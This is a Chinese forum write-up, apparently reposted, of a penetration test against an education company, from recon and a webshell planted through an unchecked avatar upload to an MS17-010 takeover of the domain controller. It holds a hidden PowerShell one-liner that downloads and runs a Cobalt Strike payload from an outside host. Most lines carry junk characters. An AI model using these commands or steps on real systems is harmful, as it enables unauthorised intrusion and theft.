; u" Q! r' |2 T4 H5 q* k4 o 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
1 u$ v) J* l: u' r% d- } ! j `) Y. I( H
7 ]" M- ?8 j( H# X " v9 i, I6 _0 g- }& \ B
6 E' p; h( l# M7 n+ B/ L) I
& l- P5 R4 p4 X2 L( c2 G- j$ y 正文
# ~+ g% x l) e' g5 Y/ F6 t m$ \
7 Z. C- f5 w& T6 y+ T; E4 Q, v' I: Z6 }0 w' G+ v# Y$ z1 |$ Y# k. _! d
* _ K* V' e* _+ ?4 C
! z9 W- P6 N) `4 v; f+ Y' F/ ^# r# W! _ t' q' W- {. J# v/ J
目标:www.xxxx.com(一家教育机构) $ W P. f2 E* o3 Q6 q
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能4 _+ K) Y7 h5 K
! a! s: q1 S' [# x* A# F- I
' _9 W/ }& t$ f$ R( h - ^0 Q+ g% O) o" H7 y2 S
1 h1 C6 r* g0 @/ u. v
/ }0 @6 b9 `4 {! X: r
进行了简单的信息搜集
9 x& R9 a m" {! j$ C
2 y" ~$ B0 G% ~. W$ j5 {4 o$ Q9 {' M( u4 g- S7 ]# _
) p9 F8 y/ E0 R' j2 X6 }8 b. S/ t n4 Y- O% Y0 E8 K4 f
子域名搜集% Y# X7 n0 H8 ?! o* W
' X% M: R# C% u/ q: `+ J0 k/ b% r. {4 ]. N/ ]3 w6 e
4 s c5 q/ b, e1 _7 f' x: {3 \ 8 s: c5 Y {/ Y/ N+ ]9 I: A# t# _
9 U, {+ Y! I( r: `; A fofa找资产
1 F8 ?* K' O1 r7 c9 M4 E" v
4 F# q& p& X4 ?( p) Y& Y
. ~: q4 e6 x. N$ G: `6 _ * ^0 ?; G& Y. A5 i" c3 e
2 E2 L. E" a2 x( l
! E' q4 R6 ^" S: A1 x8 c
3 }/ y; J7 Q6 V
) @2 F$ H! b p$ v6 _ 一共七个资产。去重之后只有两个。 0 d, K" w0 C! Y
( ~. U# z$ C' b$ |# x+ r! l
+ k' B% M l5 Z9 ^: P " m: K( p U9 K% J8 t0 z9 v- ^7 K& `
, _- l; K0 v$ I: ?& n- t O 目录探测
5 j6 A' j% e/ v/ B
$ y) I& v1 t9 w1 E, @4 O/ X, v. e9 T9 J" E7 I
5 N3 s W. o8 b- u/ ` s- }9 G! r - x% _) j4 U% i$ G" I' ?% b. n0 s) J
& _# e7 R2 R' \+ t4 X: V 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
! }& ]$ S9 k1 `2 l
T; }6 O# H! s# ~
$ `* R7 g4 _. F. A) z% Y7 b 9 G; R' _/ u# E n7 \' e
" v9 E* ?7 z# V }) O$ n# {# K
我又尝试了通过修改返回包来绕过登录界面1 S" H$ t, m9 p
4 _5 N0 O) q% u7 j8 J7 ^/ J" ~* D: P" M! H+ Z
, D9 L5 A' O, m" \' z* J8 R . p# C c' F, x
8 |' _3 o C f# \6 Z 还是不行,尝试注入无果2 G8 d# R3 f3 J4 U3 \$ h3 V
. I0 t) s6 Q; X8 M4 ~+ e
7 i( Y" U. E2 g8 Z5 Q6 {( ?9 O3 \
/ g# m- |+ g( T, w+ M/ n; O8 V/ k
5 U4 v( K4 @. V. D; R5 T! @2 O- v* N" F
不过我目录探测出了一处Spring信息泄露 & u) P# l6 x4 t/ g3 B
9 }9 Y+ k0 @- p) O( n B
I v1 D9 h4 l# u* m# e , E7 j g7 {6 Q- A5 X
9 u0 Z7 Q9 a e7 B# p7 _# V: [
6 ^% F% ^, ~$ r) I0 i' Y" I! C . f, e6 F6 M, l K/ e
4 l1 \) E3 z' g& X 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录' X! L; }) R' g$ F
& ], |+ g9 ^8 p! s! y' S
" @1 x+ b5 E4 C1 T, ] / K5 O5 h) j4 v4 ^6 w e
& q2 E X7 f/ ~- g; ~' r
) T, D2 g6 Y% Z8 G( v 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
4 ` ^) X4 c3 s, t ' \7 P# |: f" B: u1 T
- I* W% |$ R# W6 @8 k( g% `/ \* J 6 R' ~& K7 ?4 C
# f3 U! o1 c( O5 P! Y' v
, h" K, ]/ G4 T/ [) a 获取有些师傅到这一步就手机抓包电脑测了。5 \+ C+ \; Z9 M
: R6 L1 E! @8 n0 M0 ~" |
0 \: q! U! ?0 c8 G, } Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
, E, p$ a+ {5 D ' L A0 \" w/ J8 Q% u, O8 e% @9 C
& H, D. b- l+ t4 _& C6 s3 H. e 其中在一个公众号发现了小程序,可以进行注册。
9 f I" _+ D' R- c/ P % E6 h8 ~! ?* ^
# u% f6 F2 H5 S% D' P$ v! T
看到了头像上传,尝试上传获取WebShell. t; \& v2 V4 s: Y* S
& L' B8 S i# M. z9 U
' f4 S5 z( x" b" v- ] 6 D% N& ]8 n2 l. Q* G/ j
* k* _7 d6 a1 e% F) a2 O! A2 M, u0 v- e$ X, r- i( k2 z& o7 `# X
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
7 H# u Y4 j6 A `4 ? 1 O9 o$ d3 f$ Q9 C4 w
. f0 }6 y0 P& _1 s
( U4 d4 I2 e; @, N# z/ F
% R. N6 C8 ~$ U+ s3 E5 k& d8 J: f. R* P+ r0 @
然后上了大马
7 c! E- T, X. j
* P% l) z' S+ v2 ?" t9 b# h
1 `' g$ x* E0 G- V2 _
, G8 \/ V1 ?" M' K2 [# v7 f2 C# Y
i6 ~7 g" I* B2 D# C P
m; |; ?) _( |- z
/ J* Z+ A1 K p4 \
6 c0 \& c/ H' _% X+ O( N6 ]% ^& k. S+ l/ g# w% |7 S
通过翻找文件发现数据库账号密码% g- r8 b% X: _8 b
1 w: _/ l( W. c0 y0 ?% X; q% F
! w n4 f( @6 c' P2 \* {3 u % }0 M) H# q* `# X5 M, I4 l' A
0 H0 t0 a- J! E7 b7 z% q) I" F* i2 {6 o2 D0 o: L3 w# C
--内网渗透
+ [. _6 Q7 H, [8 h, r
' D- E; X, h8 b, J- w* R. l5 R% E3 A; U4 f( D( X8 b
直接通过powershell执行 cs上线' p- \: `: A4 Z9 v* K. Z
; Z+ {6 E0 `7 q/ p$ _ t' _" Q/ t: v( x! v w4 R1 \9 h. ?1 j. j
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
+ |1 n# J' c1 k
2 o& t+ K/ Y! h- \
- C8 b" R9 H- [: _ 2 `5 e7 C% Z+ J2 f# U2 [- B
6 U( P+ ^9 L5 [! Z; M
. c$ u& S, ^$ ^1 K3 l; t. i
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破- J- o k9 p' J# I
5 c! U- e Z( H- d
1 ^ n. L3 \6 G 7 c5 R [$ q4 n8 W* I5 n
) _5 O$ P/ h; M! o7 b
( f" B8 V0 V& ]) |, J: n- T 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
; V' D/ n8 q% A8 @# Z6 } ; _) T1 X8 _- o
, Z0 h* D) n. i$ A ?% i7 ?3 G w V
4 K3 k% F0 z* K! i: W7 T
; s4 Q" G! {! V7 t
$ q8 g7 ~. {6 v% n/ a 5 a/ y; t# T5 N. {
0 q( s1 \" f0 G! ]3 q; q ^# ^' q. M# e& {3 s+ ^; a% @4 i
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
" q l- d% B% r0 f3 F/ v q / O: k' ~7 e4 m- z7 @" M0 t
* @) f3 B7 d, r& Z, k" G8 K& n, @" O/ v" z
# \5 m# t2 F$ q2 |( Y; a
6 a2 r: J8 W+ r; G7 x( }& ~ ; r# O% D) P; _! X# z4 o# L: c1 s* w
: a; `9 }+ L4 O
( F4 i5 j6 u2 Q& b2 K) C * p( Z% B0 O# S' g0 e- |% D" V
0 e+ N. `3 [5 U
" d$ U$ g3 X! _7 ?
# `% L3 |5 G4 {- U0 Q5 E5 M' ~
& |* r9 |- }3 r( B# {" I0 t
( @) _4 C6 J/ Z6 T9 F
- n; ?9 o, T7 K+ K+ K$ {; a3 p6 }' O9 ~5 K
小结
) D4 H ]6 m, g/ ~( f& S4 `
" E2 S* ?' R0 ]
0 n& C0 g+ O1 X1 R( B( V; A9 F 2 o9 W, W u, P, D4 H% ^8 ], \
8 i2 e J, N: L* J. w' p. v8 u6 D$ T
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!1 N6 |! u5 h) ~7 \; \
3 c$ Q/ P& I2 v# N' v& |$ J* u
1 i5 X1 g; F# P* U+ F! @: z+ q 1 j6 m6 C0 A) t7 n% c9 E% n! Y4 a
% u/ _6 E+ F5 H8 ~; r% f+ j" e8 }, q/ b9 E
- 4 H2 A6 k6 x7 U) ~3 e
% a j0 G( y9 y8 g8 _
2 d/ ]- x7 h9 H5 B - $ w* x, H, Q, b
3 s) N3 `. n4 z$ F7 P9 A) U
& y, g5 X; w: L5 `3 F3 J1 b
' A& N1 _) [7 d( i9 v% [0 D, Q
# J) K% G0 S n# k
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
8 l$ M0 `6 [% b, Z# ]6 ]6 c ; n4 j, L. V5 V5 m3 M. g
9 N% j' O ]2 ~: ]
( K# u5 K o( F+ ^$ D9 D |